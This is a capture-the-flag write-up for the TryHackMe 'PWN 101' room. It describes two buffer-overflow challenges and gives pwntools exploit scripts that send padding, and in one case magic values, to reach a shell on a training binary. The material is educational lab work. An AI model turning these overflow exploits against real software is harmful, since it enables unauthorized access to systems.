# PWN 101  https://tryhackme.com/room/pwn101 ## Challenge 1  First issue tried to run locally and se what it needs  Then lets check on binary and see what is in. I used ghidra  We can see that in the code its just matter of overflow since array bound is not counted then will just need to overflow data on local_48 value to be above or equal to 60 so that we get sh shell #### SOLUTION ``` #!/usr/bin/env python3 #@barcrange #pip install pwn from pwn import * #python file.py REMOTE if args.REMOTE: p = remote("xx.xx.xx.xx", 9001) #python file.py LOCAL if args.LOCAL: p = process("./pwn101.pwn101") payload = b"" payload += b"A"*60 p.sendlineafter(b"Type the required ingredients to make briyani: ", payload) p.interactive() ``` Lets check localy if its gives sh shell  Now since locally its working lets go and check on remote and grab the flag  ## Challenge 2  First issue tried to run locally and se what it needs  Then lets check on binary and see what is in. I used ghidra  In this we can see that we have to overflow 104 characters from local_78 then we can see on line 15 we need to add and bypass ``if ((local_c == 0xc0ff33) && (local_10 == 0xc0d3)) `` #### SOLUTION ``` #!/usr/bin/env python3 #@barcrange #pip install pwn from pwn import * #python file.py REMOTE if args.REMOTE: p = remote("xx.xx.xx.xx", 9002) #python file.py LOCAL if args.LOCAL: p = process("./pwn102.pwn102") payload = b"" payload += b"A"*104 payload += p32(0xc0d3) payload += p32(0xc0ff33) print("Payload used is :") print(payload) p.sendlineafter(b"Am I right? ", payload) p.interactive() ``` Lets check localy if its gives sh shell  Now since locally its working lets go and check on remote and grab the flag